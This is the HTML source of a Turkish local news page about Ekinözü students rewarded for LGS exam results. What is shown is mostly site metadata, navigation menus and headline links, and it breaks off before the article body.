  <!DOCTYPE html>
<html lang="tr" class="sayfa-haber hs-rush no-inlinesvg site-center" itemscope itemtype="http://schema.org/NewsArticle">
  <head>
    <title>LGS’de başarılı olan öğrenciler ödüllendirildi</title>
<meta charset="utf-8">
<!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
<meta name="description" content="Ekinözü ilçesinde Liselere Geçiş Sistemi (LGS) kapsamında düzenlenen merkezi sınavda dereceye girerek başarılı olan öğrencilere diz üstü bilgisayar ve tablet hediye edildi." />
<meta name="keywords" content="LGSde başarılı olan öğrenciler ödüllendirildi" />
<meta name="news_keywords" content="LGSde başarılı olan öğrenciler ödüllendirildi">
<meta name="author" content="Elbistanın Sesi" /><meta property="og:site_name" content="Elbistanın Sesi" />
<meta property="og:title" content="LGS’de başarılı olan öğrenciler ödüllendirildi" />
<meta property="og:description" content="Ekinözü ilçesinde Liselere Geçiş Sistemi (LGS) kapsamında düzenlenen merkezi sınavda dereceye girerek başarılı olan öğrencilere diz üstü bilgisayar ve tablet hediye edildi." />
  <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2021/07/lgsde_basarili_olan_ogrenciler_odullendirildi_h70650_117ad.jpg" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://www.elbistaninsesi.com/guncel/lgsde-basarili-olan-ogrenciler-odullendirildi-h70650.html" /><meta http-equiv="refresh" content="3000" /><meta name="twitter:card" content="summary_large_image" />
<meta property="og:title" content="LGS’de başarılı olan öğrenciler ödüllendirildi" />
<meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/lgsde-basarili-olan-ogrenciler-odullendirildi-h70650.html" />
<meta name="twitter:domain" content="http://www.elbistaninsesi.com/" />
<meta name="twitter:site" content="elbistaninsesi" />
<meta name="twitter:title" content="LGS’de başarılı olan öğrenciler ödüllendirildi" />
<meta name="twitter:description" content="Ekinözü ilçesinde Liselere Geçiş Sistemi (LGS) kapsamında düzenlenen merkezi sınavda dereceye girerek başarılı olan öğrencilere diz üstü bilgisayar ve tablet hediye edildi." />
<meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2021/07/lgsde_basarili_olan_ogrenciler_odullendirildi_h70650_117ad.jpg" /><link rel="alternate" href="http://www.elbistaninsesi.com/guncel/lgsde-basarili-olan-ogrenciler-odullendirildi-h70650.html" hreflang="tr" />

<link href='https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet"/>
<link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/renk.css" rel="stylesheet"/><link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print"/>
<link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" />
<link itemprop="mainEntityOfPage" rel="canonical" href="http://www.elbistaninsesi.com/guncel/lgsde-basarili-olan-ogrenciler-odullendirildi-h70650.html">
<link rel="amphtml" href="http://www.elbistaninsesi.com/amp/guncel/lgsde-basarili-olan-ogrenciler-odullendirildi-h70650.html">
  <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2021/07/lgsde_basarili_olan_ogrenciler_odullendirildi_h70650_117ad.jpg" />
<meta property="og:image:width" content="768"/>
<meta property="og:image:height" content="432"/>
<meta itemprop="headline" content="LGS’de başarılı olan öğrenciler ödüllendirildi" />
<meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/lgsde_basarili_olan_ogrenciler_odullendirildi_h70650_117ad.jpg" />
<meta itemprop="articleSection" content="Güncel" name="section" />
<meta itemprop="dateCreated" content="2021-07-17T16:45:34+02:00" />
<meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2021/07/lgsde_basarili_olan_ogrenciler_odullendirildi_h70650_117ad.jpg" />
<meta itemprop="genre" content="news" name="medium" />
<meta itemprop="inLanguage" content="tr-TR" />
<meta itemprop="keywords" content="LGSde başarılı olan öğrenciler ödüllendirildi" name="keywords" />




<!--[if gte IE 9]>
<style type="text/css">.gradient {filter: none;}</style>
<![endif]-->
<!--[if IE 7]>
<style type="text/css">.reklam.dikey.sol .fixed{margin-left:-px;}</style>
<![endif]-->

<script type="text/javascript">
var site_url = 'http://www.elbistaninsesi.com/',
tema = 'hs-rush-php',
surum = '1.6.5',
sistem = '5.11',
theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/',
ajax_url = '_ajax/',
cat_limit = '10',
headerayar = 'header_genis',
poll_voted = '',
comment_approved = '',
lazyload = '0',
twitter_user  = 'elbistaninsesi',
facebook_user = 'elbistaninsesi',
popup_saat = '1',
yorum_harf_ayar = '1',
iftara_kalan_sure = '0',
namaz_default = 'kahramanmaras',
uye_gir = 'Üye Girişi',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Facebook ile Bağlan',
analitik_ga = 'UA-21655627-1';
</script>

    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body class="hs-lch">

    
        
    
        
        <!-- HEADER -->
    <div id="siteHeader" class="header clearfix">
      <div id="header-top" class="header-top hs-bgc clearfix">
  <div class="header-top-container">

    
    

    <div class="header-top-block header-top-cycle">
            <div class="header-top-currency">
        <div class="currency-cycle">
          <div class="hs-bgc currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">8.5176</span></div>
          <div class="hs-bgc currency-euro glyphicons white euro">EURO <span class="currency-rate">10.1401</span></div>
          <div class="hs-bgc currency-altin glyphicons white coins">ALTIN <span class="currency-rate">496.39</span></div>
          <div class="hs-bgc currency-bist glyphicons white global">BIST <span class="currency-rate">1363.28</span></div>
        </div>
      </div>
      
      <div class="header-top-hot mleft">
        <div class="hot-cycle">
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/lgsde-basarili-olan-ogrenciler-odullendirildi-h70650.html" title="LGS’de başarılı olan öğrenciler ödüllendirildi" >LGS’de başarılı olan öğrenciler ödüllendirildi</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/kuraklik-magduru-ciftcinin-gozu-kulagi-tarsimde-h70649.html" title="Kuraklık mağduru çiftçinin gözü kulağı TARSİM’de" >Kuraklık mağduru çiftçinin gözü kulağı TARSİM’de</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistan-muzik-ve-sanat-bayrami-icin-gun-sayiyor-h70648.html" title="Elbistan, müzik ve sanat bayramı için gün sayıyor" >Elbistan, müzik ve sanat bayramı için gün sayıyor</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/arilar-kentin-en-islek-caddesinde-agaca-ogul-verdi-h70646.html" title="Arılar kentin en işlek caddesinde ağaca oğul verdi" >Arılar kentin en işlek caddesinde ağaca oğul verdi</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/total-kalitesi-ve-ayricaligi-elbistanda-h70643.html" title="TOTAL kalitesi ve ayrıcalığı Elbistan’da" >TOTAL kalitesi ve ayrıcalığı Elbistan’da</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/4kattaki-evinin-penceresinden-dusen-38-yasindaki-adam-hayatini-h70642.html" title="4.kattaki evinin penceresinden düşen 38 yaşındaki adam hayatını kaybetti" >4.kattaki evinin penceresinden düşen 38 yaşındaki adam hayatını...</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/polisten-bayrama-magdur-girmeyin-uyarisi-h70640.html" title="Polisten ‘bayrama mağdur girmeyin’ uyarısı" >Polisten ‘bayrama mağdur girmeyin’ uyarısı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/bayrami-guvenle-karsilayalim-cagrisi-h70639.html" title="“Bayramı güvenle karşılayalım” çağrısı" >“Bayramı güvenle karşılayalım” çağrısı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/bir-kirsal-mahalleye-daha-yeni-kopru-h70638.html" title="Bir kırsal mahalleye daha yeni köprü" >Bir kırsal mahalleye daha yeni köprü</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/goksunda-tesis-kurma-sartli-maden-ihalesi-h70637.html" title="Göksun’da tesis kurma şartlı maden ihalesi" >Göksun’da tesis kurma şartlı maden ihalesi</a>
                </div>
                    </div>
      </div>
    </div>

    <div class="header-top-block header-top-right">
      <div class="header-top-user">

              <div class="btn-group">
                <button class="btn btn-user hs-bgco dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button>
                <ul id="memberArea" class="dropdown-menu hs-bgcd">
                </ul>
              </div>

      </div>
    </div>

      <div id="sb-search" class="header-top-block header-top-search sb-search">
            <form action="http://www.elbistaninsesi.com/" method="get">
              <input type="hidden" name="m" value="arama">


                            

              <input class="sb-search-input hs-bgcd" placeholder="Haber Ara ..." type="search" name="q" id="search">
              <input type="hidden" name="auth" value="2f57c9c41ad826f6155e27c177fc442323d19514" />
              <input class="sb-search-submit" type="submit" value="">
              <span class="sb-icon-search hs-bgc"></span>
            </form>
          </div>
  </div>
</div>
      <div id="logo" class="container">
  <div class="row">
        <div class="span3">
              <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="LGS’de başarılı olan öğrenciler ödüllendirildi" /></a></span>
          </div>
    <div class="span9">
          </div>
      </div>
</div>

<div id="menu" class="clearfix">

  <div class="kategori">
    <div class="container">
      <a href="http://www.elbistaninsesi.com/" class="glyphicons home"></a>

      
      
            <a href="http://www.elbistaninsesi.com/yazarlar/" class="glyphicons parents">Yazarlar</a>
      
      

      
              <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7"    >Vefatlar</a>
<a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current"   >Güncel</a>
<a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2"    >Politika</a>
<a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4"    >Sağlık</a>
<a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5"    >Eğitim / Kültür</a>
<a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1"    >Spor</a>
<a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3"    >Ekonomi</a>
<a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9"    >Arşiv Özel</a>
<a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13"    >Seçim Sonucu</a>
<a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17"    >YEREL</a>
<div class="other pull-right"><a href="#" class="all glyphicons show_lines" title="Diğer Kategoriler"></a></div>      
      
      
    </div>
  </div>

  <div class="othercat right">
    <div class="container center">
              <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19"    >ASAYİŞ</a>
<a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20"    >KÜLTÜR-SANAT</a>
<a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21"    >GENEL</a>
<a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22"    >DÜNYA</a>
<a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48"    >EĞİTİM</a>
<a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53"    >ÇEVRE</a>
<a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60"    >MAGAZİN</a>
<a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71"    >HABERDE İNSAN</a>
          </div>
  </div>

  
  <div id="katicerik" class="row-fluid">
    <div class="container"><div class="katelement kat_k7">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/zeynep-kirac-h70645.html" title="Zeynep Kıraç"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/zeynep_kirac_h70645_1658f.jpg" alt="Zeynep Kıraç" />
Zeynep Kıraç</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/ayse-sari-64-yasinda-h70644.html" title="Ayşe Sarı 64 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/ayse_sari_64_yasinda_h70644_d7c8a.jpg" alt="Ayşe Sarı 64 yaşında" />
Ayşe Sarı 64 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/rukiye-yildiz-66-yasinda-h70641.html" title="Rukiye Yıldız 66 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Rukiye Yıldız 66 yaşında" />
Rukiye Yıldız 66 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/gamze-nur-cetin-21-yasinda-h70633.html" title="Gamze Nur Çetin 21 Yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/gamze_nur_cetin_21_yasinda_h70633_1e088.jpg" alt="Gamze Nur Çetin 21 Yaşında" />
Gamze Nur Çetin 21 Yaşında</a>
</div>
</div></div><div class="katelement kat_k8">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/kisitlamasiz-ilk-bayram-heyecani-carsi-pazara-da-yansidi-h70651.html" title="Kısıtlamasız ilk bayram heyecanı çarşı pazara da yansıdı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/kisitlamasiz_ilk_bayram_heyecani_carsi_pazara_da_yansidi_h70651_2df20.jpg" alt="Kısıtlamasız ilk bayram heyecanı çarşı pazara da yansıdı" />
Kısıtlamasız ilk bayram heyecanı çarşı pazara da yansıdı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/lgsde-basarili-olan-ogrenciler-odullendirildi-h70650.html" title="LGS’de başarılı olan öğrenciler ödüllendirildi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/lgsde_basarili_olan_ogrenciler_odullendirildi_h70650_117ad.jpg" alt="LGS’de başarılı olan öğrenciler ödüllendirildi" />
LGS’de başarılı olan öğrenciler ödüllendirildi</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/kuraklik-magduru-ciftcinin-gozu-kulagi-tarsimde-h70649.html" title="Kuraklık mağduru çiftçinin gözü kulağı TARSİM’de"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/kuraklik_magduru_ciftcinin_gozu_kulagi_tarsimde_h70649_31a60.jpg" alt="Kuraklık mağduru çiftçinin gözü kulağı TARSİM’de" />
Kuraklık mağduru çiftçinin gözü kulağı TARSİM’de</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/elbistan-muzik-ve-sanat-bayrami-icin-gun-sayiyor-h70648.html" title="Elbistan, müzik ve sanat bayramı için gün sayıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/elbistan_muzik_ve_sanat_bayrami_icin_gun_sayiyor_h70648_917b8.jpg" alt="Elbistan, müzik ve sanat bayramı için gün sayıyor" />
Elbistan, müzik ve sanat bayramı için gün sayıyor</a>
</div>
</div></div><div class="katelement kat_k2">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" />
İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" />
AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" />
Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" />
MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a>
</div>
</div></div><div class="katelement kat_k4">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" />
Crown Dental hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" />
Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" />
Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" />
EDH, obezite cerrahisinde söz sahibi olmaya başladı</a>
</div>
</div></div><div class="katelement kat_k5">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" />
Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" />
Otizmli çocuklar için özel etkinlik</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" />
Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" />
Nurhak Kaymakamlığı’ndan eğitime özel destek</a>
</div>
</div></div><div class="katelement kat_k1">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" />
Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" />
Filenin sultanları, Nevşehir’i ağırlayacak</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" />
PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" />
Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a>
</div>
</div></div><div class="katelement kat_k3">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" />
Mikrokredi desteği koronavirüs döneminde de devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" />
Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" />
ETSO ve TEB kredi protokolü imzaladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" />
DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a>
</div>
</div></div><div class="katelement kat_k9">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" />
17 EKİM 1968 PAZARTESİ</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" />
13 EKİM 1968 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" />
17 AĞUSTOS 1967 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" />
30 MAYIS 1959 CUMARTESİ</a>
</div>
</div></div><div class="katelement kat_k13">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" />
16 Nisan 2017 Anayasa Değişikliği Referandumu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" />
1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" />
7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"></div></div><div class="katelement kat_k17">
<div class="kathab"><div>
